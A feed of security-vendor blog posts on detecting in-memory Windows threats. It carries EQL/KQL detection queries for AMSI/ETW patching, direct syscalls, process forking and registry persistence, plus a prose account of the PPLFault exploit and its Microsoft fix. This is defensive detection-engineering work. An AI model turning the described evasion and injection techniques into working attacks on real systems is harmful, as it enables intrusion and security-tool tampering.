Below example of matches on wwanmm.dll module stomping to replace it’s memory content with a malicious payload:

AMSI and WLDP Memory Patching
Identifies attempts to modify the permissions or write to Microsoft Antimalware Scan Interface or the Windows Lock Down Policy related DLLs from memory to modify its behavior for evading malicious content checks:
api where

 (
  (process.Ext.api.name : "VirtualProtect*" and 
    process.Ext.api.parameters.protection : "*W*") or

  process.Ext.api.name : "WriteProcessMemory*"
  ) and

 process.Ext.api.summary : ("* amsi.dll*", "* mpoav.dll*", "* wldp.dll*") 


Evasion via Event Tracing for Windows Patching
Identifies attempts to patch the Microsoft Event Tracing for Windows via memory modification:
api where process.Ext.api.name :  "WriteProcessMemory*" and 

process.Ext.api.summary : ("*ntdll.dll!Etw*", "*ntdll.dll!NtTrace*") and 

not process.executable : ("?:\\Windows\\System32\\lsass.exe", "\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe")


Windows System Module Remote Hooking
Identifies attempts to write to a remote process memory to modify NTDLL or Kernelbase modules as a preparation step for stealthy code injection:
api where process.Ext.api.name : "WriteProcessMemory" and  

process.Ext.api.behaviors == "cross-process" and 

process.Ext.api.summary : ("*ntdll.dll*", "*kernelbase.dll*")

Below is an example of matches on ThreadLessInject, a new process injection technique that involves hooking an export function from a remote process to gain shellcode execution (avoiding the creation of a remote thread):

Conclusion
Until Microsoft provides vendors with kernel callbacks for security-relevant syscalls, Threat-Intelligence ETW will remain the most robust visibility into in-memory threats on Windows. At Elastic, we’re committed to putting that visibility to work for customers and optionally directly into their hands without any hidden filtering assumptions.
Stay tuned for the call stack features in upcoming releases of Elastic Security.
Resources
Rules released with 8.11:

AMSI or WLDP Bypass via Memory Patching
Call Stack Spoofing via Synthetic Frames
Evasion via Event Tracing for Windows Patching
Memory Protection Modification of an Unsigned DLL
Network Activity from a Stomped Module
Potential Evasion via Invalid Code Signature
Potential Injection via an Exception Handler
Potential Injection via Asynchronous Procedure Call
Potential Thread Call Stack Spoofing
Remote Process Injection via Mapping
Remote Process Manipulation by Suspicious Process
Remote Thread Context Manipulation
Suspicious Activity from a Control Panel Applet
Suspicious API Call from a Script Interpreter
Suspicious API from an Unsigned Service DLL
Suspicious Call Stack Trailing Bytes
Suspicious Executable Heap Allocation
Suspicious Executable Memory Permission Modification
Suspicious Memory Protection Fluctuation
Suspicious Memory Write to a Remote Process
Suspicious NTDLL Memory Write
Suspicious Null Terminated Call Stack
Suspicious Kernel32 Memory Protection
Suspicious Remote Memory Allocation
Suspicious Windows API Call from Virtual Disk or USB
Suspicious Windows API Call via Direct Syscall
Suspicious Windows API Call via ROP Gadgets
Suspicious Windows API Proxy Call
VirtualProtect API Call from an Unsigned DLL
VirtualProtect Call via NtTestAlert
VirtualProtect via Indirect Random Syscall
VirtualProtect via ROP Gadgets
Windows API via a CallBack Function
Windows System Module Remote Hooking




Inside Microsoft's plan to kill PPLFault
Fri, 15 Sep 2023 00:00:00 GMT
On September 1, 2023, Microsoft released a new build of Windows Insider Canary, version 25941. Insider builds are pre-release versions of Windows that include experimental features that may or may not ever reach General Availability (GA). Build 25941 includes improvements to the Code Integrity (CI) subsystem that mitigate a long-standing issue that enables attackers to load unsigned code into Protected Process Light (PPL) processes.
The PPL mechanism was introduced in Windows 8.1, enabling specially-signed programs to run in such a way that they are protected from tampering and termination, even by administrative processes. The goal was to keep malware from running amok — tampering with critical system processes and terminating anti-malware applications. There is a hierarchy of PPL “levels,” with higher-privilege ones immune from tampering by lower-privilege ones, but not vice-versa. Most PPL processes are managed by Microsoft but members of the Microsoft Virus Initiative are allowed to run their products at the less-trusted Anti-Malware PPL level.

A few core Windows components run at the highest level of PPL, called Windows Trusted Computing Base (WinTcb-Light). Because of the protection afforded to these components and their narrow scope of function, they are considered more trusted than most user mode code. Most of these processes (such as csrss.exe) and their complex kernel-mode counterparts (such as win32k.sys) were written decades ago under different assumptions when the kernel-user boundary was even weaker than it is today. Rather than rewrite all these components, Microsoft made these user mode processes WinTcb-Light, mitigating tampering and injection attacks. Alex Ionescu stated it clearly in 2013:

Because the Win32k.sys developers did not expect local code injection attacks to be an issue (they require Administrator rights, after all), many of these APIs didn’t even have SEH, or had other assumptions and bugs. Perhaps most famously, one of these, discovered by j00ru, and still unpatched, has been used as the sole basis of the Windows 8 RT jailbreak. In Windows 8.1 RT, this jailbreak is “fixed”, by virtue that code can no longer be injected into Csrss.exe for the attack. Similar Win32k.sys exploits that relied on Csrss.exe are also mitigated in this fashion.

To reduce the attack surface, Microsoft runs most of their PPL code with less privilege than WinTcb-Light:

Microsoft does not consider PPL to be a security boundary, meaning they won’t prioritize security patches for code-execution vulnerabilities discovered therein, but they have historically addressed some such vulnerabilities on a less-urgent basis.
Loading code into PPL processes
To load code into a PPL process, it must be signed by special certificates. This applies to both executables (process creation) and libraries (DLLs loads). For the sake of simplicity, we’ll focus on DLL loading, but the CI validation process is very similar for both. This article is focused on PPL, so we will not discuss kernel mode code integrity.
Portable Executable (PE) files come in many extensions, including EXE, DLL, SYS, OCX, CPL, and SCR. While the extension may vary, they’re all quite similar at a binary level. For a PPL process to load and execute a DLL, a few steps must be taken. Note that these steps are simplified, but should be sufficient for this article:

An application calls LoadLibrary, passing the path to the DLL to be loaded.
LoadLibrary calls into the loader within NTDLL (e.g. ntdll!LdrLoadDll), which opens a handle to the file using an API such as NtCreateFile.
The loader then passes this file handle to NtCreateSection, asking the kernel memory manager to create a section object which describes how the file is to be mapped into memory. A section object is also known as a file mapping object in higher abstraction layers (such as Win32), but since we’re focused on the kernel, we’ll keep calling them section objects. The Windows loader always uses a specific type of section called an executable image (aka SEC_IMAGE), which can only be created from PE files.
Before returning the section object to user mode, the memory manager checks the digital signature on the file to ensure it meets the requirements for the given level of PPL. The internal memory manager function MiValidateSectionCreate relies on the Code Integrity module ci.dll to handle the requisite cryptography and PKI policy.
The memory manager restructures the PE so that it can be mapped into memory and executed. This step involves creating multiple subsections, one for each of the different portions of the PE file that must be mapped differently. For example, global variables may be read-write, whereas the code may be execute-read. To achieve this granularity, the resulting regions of memory must have distinct page table entries with different page permissions. Other changes may be applied here, such as applying relocations, but they are out of scope for this research publication.
The kernel returns the new section handle to the loader in NTDLL.
The NTDLL loader then asks the kernel memory manager to map a view of the section into the process address space via the NtMapViewOfSection syscall. The memory manager complies.
Once the view is mapped, the loader finishes the processing required to create a functional DLL in memory. The details of this are out of scope.

Page hashes
In the above steps, we can see that a PE’s digital signature is validated during section creation, but there is another way that code can be loaded into the address space of a PPL process - paging.
Unmodified pages belonging to file-backed sections (including SEC_IMAGE) can be quickly discarded whenever the system is low on memory because there’s a copy of that exact data on disk. If the page is later touched, the CPU will issue a page fault, and the memory manager’s page fault handler will re-read that data from disk. Because SEC_IMAGE sections can only be created from immutable file data, and the signature has already been verified, the data is considered trusted.
PE files may be optionally built with the /INTEGRITYCHECK flag. This sets a flag in the PE header that, among other things, instructs the memory manager to create and store hashes of every page (aka “page hashes”) of that PE as sections are created from it. After reading a page from disk, the page fault handler calls MiValidateInPage to verify that the page hash hasn’t changed since the signature was initially verified. If the page hash has changed, the handler will raise an exception. This feature is useful for detecting bit rot in the page file and a few types of attacks. Beyond /INTEGRITYCHECK images, page hashes are also enabled for all modules loaded into full Protected Processes (not PPL), and drivers loaded into the kernel.
Note: It is possible to create a SEC_IMAGE section from a file with user-writable references, a tactic employed by techniques like Process Herpaderping. The existence of user-writable references means that a file could be modified after the image section is created.  When a program attempts to use such a mutable file, the memory manager first copies the file’s contents to the page file, creating an immutable backing for the image section to prevent tampering. In this case, the section will not be backed by the original file, but instead by the page file. See this Microsoft article for more information about user-writable references.
Exploitation
In September 2022, Gabriel Landau from Elastic Security filed VULN-074311 with MSRC, notifying them of two zero-day vulnerabilities in Windows: one admin-to-PPL and one PPL-to-kernel. Two exploits for these vulnerabilities were provided named PPLFault and GodFault, respectively, along with their source code. These exploits allow malware to bypass LSA protection, terminate or blind EDR software, and modify kernel memory to tamper with core OS behavior - all without the use of any vulnerable drivers. See this article for more details on their impact.
The admin-to-PPL exploit PPLFault leverages the fact that page hashes are not validated for PPL and employs the Cloud Filter API to violate immutability assumptions of files backing SEC_IMAGE sections. PPLFault uses paging to inject code into a DLL loaded within a PPL process running as WinTcb-Light, the most privileged form of PPL. The PPL-to-kernel exploit GodFault first uses PPLFault to get WinTcb-Light code execution, then exploits the kernel’s trust of WinTcb-Light processes to modify kernel memory, granting itself full read-write access to physical memory.
Though MSRC declined to take any action on these vulnerabilities, the Windows Defender team has shown interest. PPLFault and GodFault were released at Black Hat Asia in May 2023 alongside a mitigation to stop these exploits called NoFault.
Mitigation
On September 1, 2023, Microsoft released build 25941 of Windows Insider Canary. This build adds a new check to the memory manager function MiValidateSectionCreate which enables page hashes for all images that reside on remote devices. Comparing 25941 against its predecessor 25936, we can see the following two new basic blocks:

Decompiled into C, the new code looks like this:

When PPLFault is run, Windows Error Reporting generates an event log indicating a failure during a paging operation:

PPLFault requires its payload DLL to be loaded over the SMB network redirector to achieve the desired paging behavior. By forcing the use of page hashes for such network-hosted DLLs, the exploit can no longer inject its payload, so the vulnerability is fixed. The aforementioned NoFault mitigation released at Black Hat also targets network redirectors, blocking such DLL loads into PPL entirely. Elastic Defend 8.9.0 and later block PPLFault - please update if you haven’t already.
Tracking down the exact point of failure in a kernel debugger, we can see the page fault handler invoking CI to validate page hashes, which fails with STATUS_INVALID_IMAGE_HASH (0xC0000428). This is later converted to STATUS_IN_PAGE_ERROR (0xC0000006).
0: kd> g
Breakpoint 1 hit
CI!CiValidateImagePages+0x360:
0010:fffff805`725028b4 b8280400c0      mov     eax,0C0000428h
7: kd> k
 # Child-SP          RetAddr               Call Site
00 fffff508`1b4a6dc0 fffff805`72502487     CI!CiValidateImagePages+0x360
01 fffff508`1b4a6f90 fffff805`6f2f1bbd     CI!CiValidateImageData+0x27
02 fffff508`1b4a6fd0 fffff805`6ee35de5     nt!SeValidateImageData+0x2d
03 fffff508`1b4a7020 fffff805`6efa167b     nt!MiValidateInPage+0x305
04 fffff508`1b4a70d0 fffff805`6ef9fffe     nt!MiWaitForInPageComplete+0x31b
05 fffff508`1b4a71d0 fffff805`6ef68692     nt!MiIssueHardFault+0x3fe
06 fffff508`1b4a72e0 fffff805`6f0a784b     nt!MmAccessFault+0x3b2
07 fffff508`1b4a7460 00007fff`ccf71500     nt!KiPageFault+0x38b
08 000000b6`776bf1b8 00007fff`d5500ac0     0x00007fff`ccf71500
09 000000b6`776bf1c0 00000000`00000000     0x00007fff`d5500ac0
7: kd> !error C0000428
Error code: (NTSTATUS) 0xc0000428 (3221226536) - Windows cannot verify the 
 digital signature for this file. A recent hardware or software change 
 might have installed a file that is signed incorrectly or damaged, or 
 that might be malicious software from an unknown source.

Comparing behavior
With the fix introduced in build 25941, the final vulnerable build is 25936. Running PPLFault in both builds under a kernel debugger, we can use the following WinDbg command to see the files for which CI is computing page hashes:
bp /w "&CI!CipValidatePageHash == @rcx" CI!CipValidateImageHash 
 "dt _FILE_OBJECT @r8 FileName; g"

This command generates the following WinDbg output for build 25936, before the fix:

Here is the WinDbg output for build 25941, which includes the fix:

Conclusion
Despite taking longer than it perhaps should, it's exciting to see Microsoft taking steps to defend PPL processes (including Anti-Malware) from malware running as admin, and users will benefit if this improvement reaches GA soon. Many features in Insider, even security features, are not available in (and may never reach) GA. Microsoft is very conservative when it comes to changes with potential stability, compatibility, or performance risk; memory manager changes are among the risker types. For example, the PreviousMode kernel exploit mitigation spotted in Insider last November still hasn’t reached GA, even after at least 10 months.
Special thanks to Grzegorz Tworek for his help reverse engineering some kernel functions.


Peeling back the curtain with call stacks
Wed, 13 Sep 2023 00:00:00 GMT
Introduction
Elastic Defend provides over 550 rules (and counting) to detect and stop malicious behavior in real time on endpoints. We recently added kernel call stack enrichments to provide additional context to events and alerts. Call stacks are a win-win-win for behavioral protections, simultaneously improving false positives, false negatives, and alert explainability. In this article, we'll show you how we achieve all three of these, and how you can leverage call stacks to better understand any alerts you encounter in your environment.
What is a call stack?
When a thread running function A calls function B, the CPU automatically saves the current instruction’s address (within A) to a thread-specific region of memory called the stack. This saved pointer is known as the return address - it's where execution will resume once the B has finished its job. If B were to call a third function C, then a return address within B will also be saved to the stack. These return addresses can be retrieved through a process known as a stack walk, which reconstructs the sequence of function calls that led to the current thread state. Stack walks list return addresses in reverse-chronological order, so the most recent function is always at the top.
In Windows, when we double-click on notepad.exe, for example, the following series of functions are called:

The green section is related to base thread initialization performed by the operating system and is usually identical across all operations (file, registry, process, library, etc.)
The red section is the user code; it is often composed of multiple modules and provides approximate details of how the process creation operation was reached
The blue section is the Win32 and Native API layer; this is operation-specific, including the last 2 to 3 intermediary Windows modules before forwarding the operation details for effective execution in kernel mode

The following screenshot depicts the call stack for this execution chain:

Here is an example of file creation using notepad.exe where we can see a similar pattern:

The blue part lists the last user mode intermediary Windows APIs before forwarding the create file operation to kernel mode drivers for effective execution
The red section includes functions from user32.dll and notepad.exe, which indicate that this file operation was likely initiated via GUI
The green part represents the initial thread initialization


Events Explainability
Apart from using call stacks for finding known bad, like unbacked memory regions with RWX permissions that may be the remnants of prior code injection. Call stacks provide very low-level visibility that often reveals greater insights than logs can otherwise provide.
As an example, while hunting for suspicious process executions started by WmiPrvSe.exe via WMI, you find this instance of notepad.exe:

Reviewing the standard event log fields, you may expect that it was started using the Win32_Process class using the wmic.exe process call create notepad.exe syntax. However, the event details describe a series of modules and functions:

The blue section depicts the standard intermediary CreateProcess Windows APIs, while the red section highlights better information in that we can see that the DLL before the first call to CreateProcessW is wbemcons.dll and when inspecting its properties we can see that it’s related to WMI Event Consumers. We can conclude that this notepad.exe instance is likely related to a WMI Event Subscription. This will require specific incident response steps to mitigate the WMI persistence mechanism.

Another great example is Windows scheduled tasks. When executed, they are spawned as children of the Schedule service, which runs within a svchost.exe host process. Modern Windows 11 machines may have 50 or more svchost.exe processes running.  Fortunately, the Schedule service has a specific process argument -s Schedule which differentiates it:

In older Windows versions, the Scheduled Tasks service is a member of the Network Service group and executed as a component of the netsvcs shared svchost.exe instance. Not all children of this process are necessarily scheduled tasks in these older versions:

Inspecting the call stack on both versions, we can see the module that is adjacent to the CreateProcess call is the same ubpm.dll (Unified Background Process Manager DLL) executing the exported function ubpm.dll!UbpmOpenTriggerConsumer:

Using the following KQL query, we can hunt for task executions on both versions:
event.action :"start" and 
process.parent.name :"svchost.exe" and process.parent.args : netsvcs and 
process.parent.thread.Ext.call_stack_summary : *ubpm.dll* 


Another interesting example occurs when a user double-clicks a script file from a ZIP archive that was opened using Windows Explorer. Looking at the process tree, you will see that explorer.exe is the parent and the child is a script interpreter process like wscript.exe or cmd.exe.
This process tree can be confused with a user double-clicking a script file from any location on the file system, which is not very suspicious. But if we inspect the call stack we can see that the parent stack is pointing to zipfld.dll (Zipped Folders Shell Extension):

Detection Examples
Now that we have a better idea of how to use the call stack to better interpret events, let’s explore some advanced detection examples per event type.
Process
Suspicious Process Creation via Reflection
Dirty Vanity is a recent code-injection technique that abuses process forking to execute shellcode within a copy of an existing process. When a process is forked, the OS makes a copy of an existing process, including its address space and any inheritable handles therein.
When executed, Dirty Vanity will fork an instance of a targeted process (already running or a sacrificial one) and then inject into it. Using process creation notification callbacks won’t log forked processes because the forked process initial thread isn’t executed. But in the case of this injection technique, the forked process will be injected and a thread will be started, which triggers the process start event log with the following call stack:

We can see the call to RtlCreateProcessReflection and RtlCloneUserProcess to fork the process. Now we know that this is a forked process, and the next question is “Is this common in normal conditions?” While diagnostically this behavior appears to be common and alone, it is not a strong signal of something malicious. Checking further to see if the forked processes perform any network connections, loads DLLs, or spawns child processes revealed to be less common and made for good detections:
// EQL detecting a forked process spawning a child process - very suspicious

process where event.action == "start" and

descendant of 
   [process where event.action == "start" and 
   _arraysearch(process.parent.thread.Ext.call_stack, $entry, 
   $entry.symbol_info: 
    ("*ntdll.dll!RtlCreateProcessReflection*", 
    "*ntdll.dll!RtlCloneUserProcess*"))] and

not (process.executable : 
      ("?:\\WINDOWS\\SysWOW64\\WerFault.exe", 
      "?:\\WINDOWS\\system32\\WerFault.exe") and
     process.parent.thread.Ext.call_stack_summary : 
      "*faultrep.dll|wersvc.dl*")

// EQL detecting a forked process loading a network DLL 
//  or performs a network connection - very suspicious

sequence by process.entity_id with maxspan=1m
 [process where event.action == "start" and
  _arraysearch(process.parent.thread.Ext.call_stack, 
  $entry, $entry.symbol_info: 
    ("*ntdll.dll!RtlCreateProcessReflection*", 
    "*ntdll.dll!RtlCloneUserProcess*"))]
 [any where
  (
   event.category : ("network", "dns") or 
   (event.category == "library" and 
    dll.name : ("ws2_32.dll", "winhttp.dll", "wininet.dll"))
  )]

Here’s an example of forking explore.exe and executing shellcode that spawns cmd.exe from the forked explorer.exe instance:


Direct Syscall via Assembly Bytes
The second and final example for process events is process creation via direct syscall. This directly uses the syscall instruction instead of calling the NtCreateProcess API. Adversaries may use this method to avoid security products that are reliant on usermode API hooking (which Elastic Defend is not):
process where event.action : "start" and 

// EQL detecting a call stack not ending with ntdll.dll 
not process.parent.thread.Ext.call_stack_summary : "ntdll.dll*" and 

/* last call in the call stack contains bytes that execute a syscall
 manually using assembly  */

_arraysearch(process.parent.thread.Ext.call_stack, $entry,
 ($entry.callsite_leading_bytes : ("*4c8bd1b8??????000f05", 
 "*4989cab8??????000f05", "*4c8bd10f05", "*4989ca0f05")))

This example matches when the final memory region in the call stack is unbacked and contains assembly bytes that end with the syscall instruction (0F05):

File
Suspicious Microsoft Office Embedded Object
The following rule logic identifies suspicious file extensions written by a Microsoft Office process from an embedded OLE stream, frequently used by malicious documents to drop payloads for initial access.

// EQL detecting file creation event with call stack indicating 
// OleSaveToStream call to save or load the embedded OLE object

file where event.action != "deletion" and 

process.name : ("winword.exe", "excel.exe", "powerpnt.exe") and

_arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info:
 ("*!OleSaveToStream*", "*!OleLoad*")) and
(
 file.extension : ("exe", "dll", "js", "vbs", "vbe", "jse", "url", 
 "chm", "bat", "mht", "hta", "htm", "search-ms") or

 /* PE & HelpFile */
 file.Ext.header_bytes : ("4d5a*", "49545346*")
 )

Example of matches :

Suspicious File Rename from Unbacked Memory
Certain ransomware may inject into signed processes before starting their encryption routine. File rename and modification events will appear to originate from a trusted process, potentially bypassing some heuristics that exclude signed processes as presumed false positives. The following KQL query looks for file rename of documents, from a signed binary and with a suspicious call stack:
file where event.action : "rename" and 
  
process.code_signature.status : "trusted" and file.extension != null and 

file.Ext.original.name : ("*.jpg", "*.bmp", "*.png", "*.pdf", "*.doc", 
"*.docx", "*.xls", "*.xlsx", "*.ppt", "*.pptx") and

not file.extension : ("tmp", "~tmp", "diff", "gz", "download", "bak", 
"bck", "lnk", "part", "save", "url", "jpg",  "bmp", "png", "pdf", "doc", 
"docx", "xls", "xlsx", "ppt", "pptx") and 

process.thread.Ext.call_stack_summary :
("ntdll.dll|kernelbase.dll|Unbacked",
 "ntdll.dll|kernelbase.dll|kernel32.dll|Unbacked", 
 "ntdll.dll|kernelbase.dll|Unknown|kernel32.dll|ntdll.dll", 
 "ntdll.dll|kernelbase.dll|Unknown|kernel32.dll|ntdll.dll", 
 "ntdll.dll|kernelbase.dll|kernel32.dll|Unknown|kernel32.dll|ntdll.dll", 
 "ntdll.dll|kernelbase.dll|kernel32.dll|mscorlib.ni.dll|Unbacked", 
 "ntdll.dll|wow64.dll|wow64cpu.dll|wow64.dll|ntdll.dll|kernelbase.dll|
 Unbacked", "ntdll.dll|wow64.dll|wow64cpu.dll|wow64.dll|ntdll.dll|
 kernelbase.dll|Unbacked|kernel32.dll|ntdll.dll", 
 "ntdll.dll|Unbacked", "Unbacked", "Unknown")

Here are some examples of matches where explorer.exe (Windows Explorer) is injected by the KNIGHT/CYCLOPS ransomware:

Executable File Dropped by an Unsigned Service DLL
Certain types of malware maintain their presence by disguising themselves as Windows service DLLs. To be recognized and managed by the Service Control Manager, a service DLL must export a function named ServiceMain. The KQL query below helps identify instances where an executable file is created, and the call stack includes the ServiceMain function.
event.category : file and 
 file.Ext.header_bytes :4d5a* and process.name : svchost.exe and 
 process.thread.Ext.call_stack.symbol_info :*!ServiceMain*


Library
Unsigned Print Monitor Driver Loaded
The following EQL query identifies the loading of an unsigned library by the print spooler service where the call stack indicates the load is coming from SplAddMonitor. Adversaries may use port monitors to run an adversary-supplied DLL during system boot for persistence or privilege escalation.
library where
process.executable : ("?:\\Windows\\System32\\spoolsv.exe", 
"?:\\Windows\\SysWOW64\\spoolsv.exe") and not dll.code_signature.status : 
"trusted" and _arraysearch(process.thread.Ext.call_stack, $entry, 
$entry.symbol_info: "*localspl.dll!SplAddMonitor*")

Example of match:

Potential Library Load via ROP Gadgets
This EQL rule identifies the loading of a library from unusual win32u or ntdll offsets. This may indicate an attempt to bypass API monitoring using Return Oriented Programming (ROP) assembly gadgets to execute a syscall instruction from a trusted module.
library where
// adversaries try to use ROP gadgets from ntdll.dll or win32u.dll 
// to construct a normal-looking call stack

process.thread.Ext.call_stack_summary : ("ntdll.dll|*", "win32u.dll|*") and 

// excluding normal Library Load APIs - LdrLoadDll and NtMapViewOfSection
not _arraysearch(process.thread.Ext.call_stack, $entry, 
 $entry.symbol_info: ("*ntdll.dll!Ldr*", 
 "*KernelBase.dll!LoadLibrary*", "*ntdll.dll!*MapViewOfSection*"))

This example matches when AtomLdr loads a DLL using ROP gadgets from win32u.dll instead of using ntdll’s load library APIs (LdrLoadDll and NtMapViewOfSection).

Evasion via LdrpKernel32 Overwrite
The [LdrpKernel32(https://github.com/rbmm/LdrpKernel32DllName) evasion is an interesting technique to hijack the early execution of a process during the bootstrap phase by overwriting the bootstrap DLL name referenced in ntdll.dll memory– forcing the process to load a malicious DLL.
library where 
 
// BaseThreadInitThunk must be exported by the rogue bootstrap DLL
 _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info :
  "*!BaseThreadInitThunk*") and

// excluding kernel32 that exports normally exports BasethreadInitThunk
not _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info
 ("?:\\Windows\\System32\\kernel32.dll!BaseThreadInitThunk*", 
 "?:\\Windows\\SysWOW64\\kernel32.dll!BaseThreadInitThunk*", 
 "?:\\Windows\\WinSxS\\*\\kernel32.dll!BaseThreadInitThunk*", 
 "?:\\Windows\\WinSxS\\Temp\\PendingDeletes\\*!BaseThreadInitThunk*", 
 "\\Device\\*\\Windows\\*\\kernel32.dll!BaseThreadInitThunk*"))

Example of match:

Suspicious Remote Registry Modification
Similar to the scheduled task example, the remote registry service is hosted in svchost.exe. We can use the call stack to detect registry modification by monitoring when the Remote Registry service points to an executable or script file. This may indicate an attempt to move laterally via remote configuration changes.
registry where 

event.action == "modification" and 

user.id : ("S-1-5-21*", "S-1-12-*") and 

 process.name : "svchost.exe" and 

// The regsvc.dll in call stack indicate that this is indeed the 
// svchost.exe instance hosting the Remote registry service

process.thread.Ext.call_stack_summary : "*regsvc.dll|rpcrt4.dll*" and

 (
  // suspicious registry values
  registry.data.strings : ("*:\\*\\*", "*.exe*", "*.dll*", "*rundll32*", 
  "*powershell*", "*http*", "* /c *", "*COMSPEC*", "\\\\*.*") or
  
  // suspicious keys like Services, Run key and COM
  registry.path :
         ("HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ServiceDLL",
          "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath",
          "HKEY_USERS\\*Classes\\*\\InprocServer32\\",
          "HKEY_USERS\\*Classes\\*\\LocalServer32\\",
          "H*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*") or
  
  // potential attempt to remotely disable a service 
  (registry.value : "Start" and registry.data.strings : "4")
  )

This example matches when the Run key registry value is modified remotely via the Remote Registry service:

Conclusion
As we’ve demonstrated, call stacks are not only useful for finding known bad patterns, but also for reducing ambiguity in standard EDR events, and easing behavior interpretation. The examples we've provided here represent just a minor portion of the potential detection possibilities achievable by applying enhanced enrichment to the same dataset.



Upping the Ante: Detecting In-Memory Threats with Kernel Call Stacks
Wed, 31 May 2023 00:00:00 GMT
Intro
Elastic Security for endpoint, with its roots in Endgame, has long led the industry for in-memory threat detection. We pioneered and patented many detection technologies such as kernel thread start preventions, call stack anomaly hunting, and module stomping discovery. However, adversaries continue to innovate and evade detections. For example, in response to our improved memory signature protection, adversaries developed a flurry of new sleep based evasions. We aim to out-innovate adversaries and maintain protections against the cutting edge of attacker tradecraft. With Elastic Security 8.8, we added new kernel call stack based detections which provide us with improved efficacy against in-memory threats.
Before we get started, it's important to know what call stacks are and why they’re valuable for detection engineering. A call stack is the ordered sequence of functions that are executed to achieve a behavior of a program. It shows in detail which functions (and their associated modules) were executed to lead to a behavior like a new file or process being created. Knowing a behavior’s call stack, we can build detections with detailed contextual information about what a program is doing and how it’s doing it.
Deep Visibility
The new call stack based detection capability leverages our existing deep in-line kernel visibility for the most common system behaviors (process, file, registry, library, etc). With each event, we capture the call stack for the activity. This is later enriched with module information, symbols, and evidence of suspicious activity. This gives us procmon-like visibility in real-time, powering advanced preventions for in-memory tradecraft.
Process creation call stack fields : 
File, registry and library call stack fields: 
New Rules
Additional visibility wouldn’t raise the bar unless we could pair it with tuned, high confidence preventions. In 8.8, behavior protection comes out of the box with 30+ rules to provide us with high efficacy against cutting edge attacker techniques such as: - Direct syscalls - Callback-based evasion - Module Stomping - Library loading from unbacked region - Process created from unbacked region - Many more
Call stacks are a powerful data source that can be used to improve protection against non-memory-based threats as well. For example, the following EQL queries look for the creation of a child process or an executable file extension from an Office process with a call stack containing VBE7.dll (a strong sign of the presence of a macro-enabled document). This increases the signal and coverage of the rule logic while reducing the necessary tuning efforts compared to just process or file creation events with no call stack information:

Below are some examples of matches where Macro-enabled malicious Excel and Word documents spawning a child process where the call stack refers to vbe7.dll :

Here, we can see a malicious XLL file opened via Excel spawning a legitimate browser\_broker.exe to inject into. The parent call stack indicates that the process creation call is coming from the [xlAutoOpen](https://learn.microsoft.com/en-us/office/client-developer/excel/xlautoopen) function:

The same enrichment is also valuable in library load and registry events. Below is an example of loading the Microsoft Common Language Runtime CLR.DLL module from a suspicious call stack (unbacked memory region with RWX permissions) using the Sliver execute-assembly command to load external .NET assemblies:
library where dll.name : "clr.dll" and
process.thread.Ext.call_stack_summary : "*mscoreei.dll|Unbacked*"


Hunting for suspicious modification of certain registry keys such as the Run key for persistence tends to be noisy and very common in legit software but if we add the call stack signal to the logic, the suspicion level is significantly increased :
registry where 
 registry.path : "H*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*"
// the creating thread's stack contains frames pointing outside any known executable image
 and process.thread.Ext.call_stack_contains_unbacked == true


Another “fun” example is the use of the call stack information to detect rogue instances of core system processes that normally have very specific functionality. By signaturing their normal call stacks, we can easily identify outliers. For example, WerFault.exe and wermgr.exe are among the most attractive targets for masquerading:

Examples of matches:

Apart from the use of call stack data for finding suspicious behaviors, it’s also useful when it comes to excluding false positives from behavior detections in a more granular way. This also helps reduce evasion opportunities.
A good example is a detection rule looking for unusual Microsoft Office child processes. This rule is used to exclude splwow64.exe , which can be legitimately spawned by printing activity. Excluding it by process.executable creates an evasion opportunity via process hollowing or injection, which can make the process tree look normal. We can now mitigate this evasion by requiring such process creations to come from winspool.drv!OpenPrinter :
process where event.action == "start" and
  process.parent.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSACCESS.EXE", "mspub.exe", "fltldr.exe", "visio.exe") and
// excluding splwow64.exe only if it’s parent callstack is coming from winspool.drv module  
not (process.executable : "?:\\Windows\\splwow64.exe" and``_arraysearch(process.parent.thread.Ext.call_stack, $entry, $entry.symbol_info: ("?:\\Windows\\System32\\winspool.drv!OpenPrinter*", "?:\\Windows\\SysWOW64\\winspool.drv!OpenPrinter*")))


To reduce event volumes, call stack information is collected on the endpoint and processed for detections but not always streamed in events. To always include call stacks in streamed events an advanced option is available in Endpoint policy:

C2 Coverage
Elastic Endpoint makes quick work detecting some of the top C2 frameworks active today. See below for a screenshot detecting Nighthawk, BruteRatel, CobaltStrike, and ATP41’s StealthVector.


Conclusion
While this capability gives us a lead over the cutting edge of in-memory tradecraft today, attackers will no doubt develop new innovations in attempts to evade it. That’s why we are already hard at work to deliver the next set of leading in-memory detections. Stay tuned!
Resources
Rules released with 8.8:

Execution from a Macro Enabled Office Document
Suspicious Macro Execution via Windows Scripts
Suspicious File Dropped by a Macro Enabled Document
Shortcut File Modification via Macro Enabled Document
DLL Loaded from a Macro Enabled Document
Process Creation via Microsoft Office Add-Ins
Registry or File Modification from Suspicious Memory
Access to Browser Credentials from Suspicious Memory
Potential NTDLL Memory Unhooking
Microsoft Common Language Runtime Loaded from Suspicious Memory
Common Language Runtime Loaded via an Unsigned Module
Potential Masquerading as Windows Error Manager
Suspicious Image Load via LdrLoadDLL
Library Loaded via a CallBack Function
Process Creation from Modified NTDLL
DLL Side Loading via a Copied Microsoft Executable
Potential Injection via the Console Window Class
Suspicious Unsigned DLL Loaded by a Trusted Process
Process Started via Remote Thread
Potential Injection via DotNET Debugging
Potential Process Creation via ShellCode
Module Stomping form a Copied Library
Process Creation from a Stomped Module
Parallel NTDLL Loaded from Unbacked Memory
Potential Operation via Direct Syscall
Potential Process Creation via Direct Syscall
Process from Archive or Removable Media via Unbacked Code
Network Module Loaded from Suspicious Unbacked Memory
Rundll32 or Regsvr32 Loaded a DLL from Unbacked Memory
Windows Console Execution from Unbacked Memory
Process Creation from Unbacked Memory via Unsigned Parent




Effective Parenting - detecting LRPC-based parent PID spoofing
Wed, 29 Mar 2023 00:00:00 GMT
